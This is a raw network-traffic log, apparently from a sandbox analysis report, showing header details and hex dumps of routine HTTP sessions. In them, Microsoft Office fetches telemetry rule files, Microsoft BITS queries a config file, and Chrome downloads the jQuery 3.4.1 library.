                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:41:53 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:41:53 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 450
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BD4C869AE"
                                                                                                                                                                                                                                                                                x-ms-request-id: d4448e94-101e-00a2-2703-179f2e000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144153Z-1657d5bbd48vhs7r2p1ky7cs5w00000002c000000000g3gw
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:41:53 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                7192.168.2.64973113.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:41:53 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:41:53 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:41:53 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 408
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BB56D3AFB"
                                                                                                                                                                                                                                                                                x-ms-request-id: b27588a3-a01e-003d-6001-1798d7000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144153Z-1657d5bbd48qjg85buwfdynm5w000000029g000000002rcr
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:41:53 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                8192.168.2.64973013.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:41:53 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:41:53 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:41:53 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 2160
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BA3B95D81"
                                                                                                                                                                                                                                                                                x-ms-request-id: c62b5fc1-401e-0067-3a60-1709c2000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144153Z-1657d5bbd487nf59mzf5b3gk8n00000001s000000000b5hs
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:41:53 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                9192.168.2.649726184.28.90.27443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:41:53 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                                                                                Host: fs.microsoft.com
                                                                                                                                                                                                                                                                                2024-10-06 14:41:53 UTC465INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                                                Server: ECAcc (lpl/EF17)
                                                                                                                                                                                                                                                                                X-CID: 11
                                                                                                                                                                                                                                                                                X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                                                                                                                X-Ms-Region: prod-neu-z1
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=7481
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:41:53 GMT
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                X-CID: 2


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                10192.168.2.649732151.101.194.1374433568C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:41:53 UTC358OUTGET /jquery-3.4.1.min.js HTTP/1.1
                                                                                                                                                                                                                                                                                Host: code.jquery.com
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-06 14:41:53 UTC613INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Content-Length: 88145
                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                                                                                                                                                                                                ETag: "28feccc0-15851"
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:41:53 GMT
                                                                                                                                                                                                                                                                                Age: 3474852
                                                                                                                                                                                                                                                                                X-Served-By: cache-lga21965-LGA, cache-ewr-kewr1740051-EWR
                                                                                                                                                                                                                                                                                X-Cache: HIT, HIT
                                                                                                                                                                                                                                                                                X-Cache-Hits: 1554, 2
                                                                                                                                                                                                                                                                                X-Timer: S1728225714.572147,VS0,VE0
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                2024-10-06 14:41:53 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 34 2e 31 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20
                                                                                                                                                                                                                                                                                Data Ascii: /*! jQuery v3.4.1 | (c) JS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery
                                                                                                                                                                                                                                                                                2024-10-06 14:41:53 UTC1378INData Raw: 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 6b 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6b 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 6b 2e 6d 61 70 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 6e 2e 63 61 6c 6c 28 65 2c 74 2c 65 29 7d 29 29 7d 2c 73 6c 69 63 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73
                                                                                                                                                                                                                                                                                Data Ascii: th]:this[e]},pushStack:function(e){var t=k.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return k.each(this,e)},map:function(n){return this.pushStack(k.map(this,function(e,t){return n.call(e,t,e)}))},slice:function(){return this
                                                                                                                                                                                                                                                                                2024-10-06 14:41:53 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f 6e 63 65 7d 29 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 30 3b 69 66 28 64 28 65 29 29 7b 66 6f 72 28 6e 3d 65 2e 6c 65 6e 67 74 68 3b 72 3c 6e 3b 72 2b 2b 29 69 66 28 21 31 3d 3d 3d 74 2e 63 61 6c 6c 28 65 5b 72 5d 2c 72 2c 65 5b 72 5d 29 29 62 72 65 61 6b 7d 65 6c 73 65 20 66 6f 72 28 72 20 69 6e 20 65 29 69 66 28 21 31 3d 3d 3d 74 2e 63 61 6c 6c 28 65 5b 72 5d 2c 72 2c 65 5b 72 5d 29 29 62 72 65 61 6b 3b 72 65 74 75 72 6e 20 65 7d 2c 74 72 69 6d 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 22 22 3a 28 65 2b 22 22 29 2e 72 65 70 6c 61 63 65 28 70 2c 22 22 29 7d 2c 6d 61 6b 65 41 72 72 61 79
                                                                                                                                                                                                                                                                                Data Ascii: ion(e,t){b(e,{nonce:t&&t.nonce})},each:function(e,t){var n,r=0;if(d(e)){for(n=e.length;r<n;r++)if(!1===t.call(e[r],r,e[r]))break}else for(r in e)if(!1===t.call(e[r],r,e[r]))break;return e},trim:function(e){return null==e?"":(e+"").replace(p,"")},makeArray
                                                                                                                                                                                                                                                                                2024-10-06 14:41:53 UTC1378INData Raw: 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 2c 49 3d 22 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5c 5c 77 2d 5d 7c 5b 5e 5c 30 2d 5c 5c 78 61 30 5d 29 2b 22 2c 57 3d 22 5c 5c 5b 22 2b 4d 2b 22 2a 28 22 2b 49 2b 22 29 28 3f 3a 22 2b 4d 2b 22 2a 28 5b 2a 5e 24 7c 21 7e 5d 3f 3d 29 22 2b 4d 2b 22 2a 28 3f 3a 27 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 27 5d 29 2a 29 27 7c 5c 22 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 5c 22 5d 29 2a 29 5c 22 7c 28 22 2b 49 2b 22 29 29 7c 29 22 2b 4d 2b 22 2a 5c 5c
                                                                                                                                                                                                                                                                                Data Ascii: trols|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t\\r\\n\\f]",I="(?:\\\\.|[\\w-]|[^\0-\\xa0])+",W="\\["+M+"*("+I+")(?:"+M+"*([*^$|!~]?=)"+M+"*(?:'((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\"|("+I+"))|)"+M+"*\\
                                                                                                                                                                                                                                                                                2024-10-06 14:41:53 UTC1378INData Raw: 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c 78 37 66 2d 5c 75 46 46 46 46 5c 77 2d 5d 2f 67 2c 69 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 3f 22 5c 30 22 3d 3d 3d 65 3f 22 5c 75 66 66 66 64 22 3a 65 2e 73 6c 69 63 65 28 30 2c 2d 31 29 2b 22 5c 5c 22 2b 65 2e 63 68 61 72 43 6f 64 65 41 74 28 65 2e 6c 65 6e 67 74 68 2d 31 29 2e 74 6f 53 74 72 69 6e 67 28 31 36 29 2b 22 20 22 3a 22 5c 5c 22 2b 65 7d 2c 6f 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 54 28 29 7d 2c 61 65 3d 62 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 21 30 3d 3d 3d 65 2e 64 69 73 61 62 6c 65 64 26 26 22 66 69 65 6c 64 73 65 74 22 3d 3d 3d 65 2e 6e 6f 64 65 4e 61 6d 65
                                                                                                                                                                                                                                                                                Data Ascii: },re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\x7f-\uFFFF\w-]/g,ie=function(e,t){return t?"\0"===e?"\ufffd":e.slice(0,-1)+"\\"+e.charCodeAt(e.length-1).toString(16)+" ":"\\"+e},oe=function(){T()},ae=be(function(e){return!0===e.disabled&&"fieldset"===e.nodeName
                                                                                                                                                                                                                                                                                2024-10-06 14:41:53 UTC1378INData Raw: 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28 65 29 7b 41 28 74 2c 21 30 29 7d 66 69 6e 61 6c 6c 79 7b 73 3d 3d 3d 6b 26 26 65 2e 72 65 6d 6f 76 65 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 7d 7d 7d 72 65 74 75 72 6e 20 67 28 74 2e 72 65 70 6c 61 63 65 28 42 2c 22 24 31 22 29 2c 65 2c 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 75 65 28 29 7b 76 61 72 20 72 3d 5b 5d 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 20 65 28 74 2c 6e 29 7b 72 65 74 75 72 6e 20 72 2e 70 75 73 68 28 74 2b 22 20 22 29 3e 62 2e 63 61 63 68 65 4c 65 6e 67 74 68 26 26 64 65 6c 65 74 65 20 65 5b 72 2e 73 68 69 66 74 28 29 5d 2c 65 5b 74 2b 22 20 22 5d 3d 6e 7d 7d 66 75 6e 63 74 69 6f 6e 20 6c 65 28 65 29 7b 72 65 74 75 72 6e 20 65 5b 6b 5d 3d
                                                                                                                                                                                                                                                                                Data Ascii: uerySelectorAll(c)),n}catch(e){A(t,!0)}finally{s===k&&e.removeAttribute("id")}}}return g(t.replace(B,"$1"),e,n,r)}function ue(){var r=[];return function e(t,n){return r.push(t+" ")>b.cacheLength&&delete e[r.shift()],e[t+" "]=n}}function le(e){return e[k]=
                                                                                                                                                                                                                                                                                2024-10-06 14:41:53 UTC1378INData Raw: 52 49 2c 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 3b 72 65 74 75 72 6e 21 59 2e 74 65 73 74 28 74 7c 7c 6e 26 26 6e 2e 6e 6f 64 65 4e 61 6d 65 7c 7c 22 48 54 4d 4c 22 29 7d 2c 54 3d 73 65 2e 73 65 74 44 6f 63 75 6d 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 2c 72 3d 65 3f 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 3a 6d 3b 72 65 74 75 72 6e 20 72 21 3d 3d 43 26 26 39 3d 3d 3d 72 2e 6e 6f 64 65 54 79 70 65 26 26 72 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 26 26 28 61 3d 28 43 3d 72 29 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2c 45 3d 21 69 28 43 29 2c 6d 21 3d 3d 43 26 26 28 6e 3d 43 2e 64 65 66 61 75 6c 74 56 69 65 77 29 26 26 6e 2e
                                                                                                                                                                                                                                                                                Data Ascii: RI,n=(e.ownerDocument||e).documentElement;return!Y.test(t||n&&n.nodeName||"HTML")},T=se.setDocument=function(e){var t,n,r=e?e.ownerDocument||e:m;return r!==C&&9===r.nodeType&&r.documentElement&&(a=(C=r).documentElement,E=!i(C),m!==C&&(n=C.defaultView)&&n.
                                                                                                                                                                                                                                                                                2024-10-06 14:41:53 UTC1378INData Raw: 65 74 75 72 6e 5b 5d 7d 7d 29 2c 62 2e 66 69 6e 64 2e 54 41 47 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 3f 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 3f 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 65 29 3a 64 2e 71 73 61 3f 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 65 29 3a 76 6f 69 64 20 30 7d 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 5b 5d 2c 69 3d 30 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 65 29 3b 69 66 28 22 2a 22 3d 3d 3d 65 29 7b 77 68 69 6c 65 28 6e 3d 6f 5b 69 2b 2b 5d 29 31
                                                                                                                                                                                                                                                                                Data Ascii: eturn[]}}),b.find.TAG=d.getElementsByTagName?function(e,t){return"undefined"!=typeof t.getElementsByTagName?t.getElementsByTagName(e):d.qsa?t.querySelectorAll(e):void 0}:function(e,t){var n,r=[],i=0,o=t.getElementsByTagName(e);if("*"===e){while(n=o[i++])1
                                                                                                                                                                                                                                                                                2024-10-06 14:41:53 UTC1378INData Raw: 3a 64 69 73 61 62 6c 65 64 22 29 2e 6c 65 6e 67 74 68 26 26 76 2e 70 75 73 68 28 22 3a 65 6e 61 62 6c 65 64 22 2c 22 3a 64 69 73 61 62 6c 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 2a 2c 3a 78 22 29 2c 76 2e 70 75 73 68 28 22 2c 2e 2a 3a 22 29 7d 29 29 2c 28 64 2e 6d 61 74 63 68 65 73 53 65 6c 65 63 74 6f 72 3d 4b 2e 74 65 73 74 28 63 3d 61 2e 6d 61 74 63 68 65 73 7c 7c 61 2e 77 65 62 6b 69 74 4d 61 74 63 68 65 73 53 65 6c 65 63 74 6f 72 7c 7c 61 2e 6d 6f 7a 4d 61 74 63 68 65 73 53 65 6c 65 63 74 6f 72 7c 7c 61 2e 6f 4d 61 74 63 68 65 73 53 65 6c 65 63 74 6f 72 7c 7c 61 2e 6d 73 4d 61 74 63 68 65 73 53 65 6c 65 63 74 6f 72 29 29 26 26 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 64 2e 64 69 73 63 6f 6e 6e 65 63 74 65 64 4d
                                                                                                                                                                                                                                                                                Data Ascii: :disabled").length&&v.push(":enabled",":disabled"),e.querySelectorAll("*,:x"),v.push(",.*:")})),(d.matchesSelector=K.test(c=a.matches||a.webkitMatchesSelector||a.mozMatchesSelector||a.oMatchesSelector||a.msMatchesSelector))&&ce(function(e){d.disconnectedM
                                                                                                                                                                                                                                                                                2024-10-06 14:41:53 UTC1378INData Raw: 7d 29 2c 43 7d 2c 73 65 2e 6d 61 74 63 68 65 73 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 73 65 28 65 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 74 29 7d 2c 73 65 2e 6d 61 74 63 68 65 73 53 65 6c 65 63 74 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 21 3d 3d 43 26 26 54 28 65 29 2c 64 2e 6d 61 74 63 68 65 73 53 65 6c 65 63 74 6f 72 26 26 45 26 26 21 41 5b 74 2b 22 20 22 5d 26 26 28 21 73 7c 7c 21 73 2e 74 65 73 74 28 74 29 29 26 26 28 21 76 7c 7c 21 76 2e 74 65 73 74 28 74 29 29 29 74 72 79 7b 76 61 72 20 6e 3d 63 2e 63 61 6c 6c 28 65 2c 74 29 3b 69 66 28 6e 7c 7c 64 2e 64 69 73 63 6f 6e 6e 65 63 74 65 64 4d 61 74 63 68 7c 7c 65 2e 64 6f 63 75 6d 65 6e 74 26 26 31 31
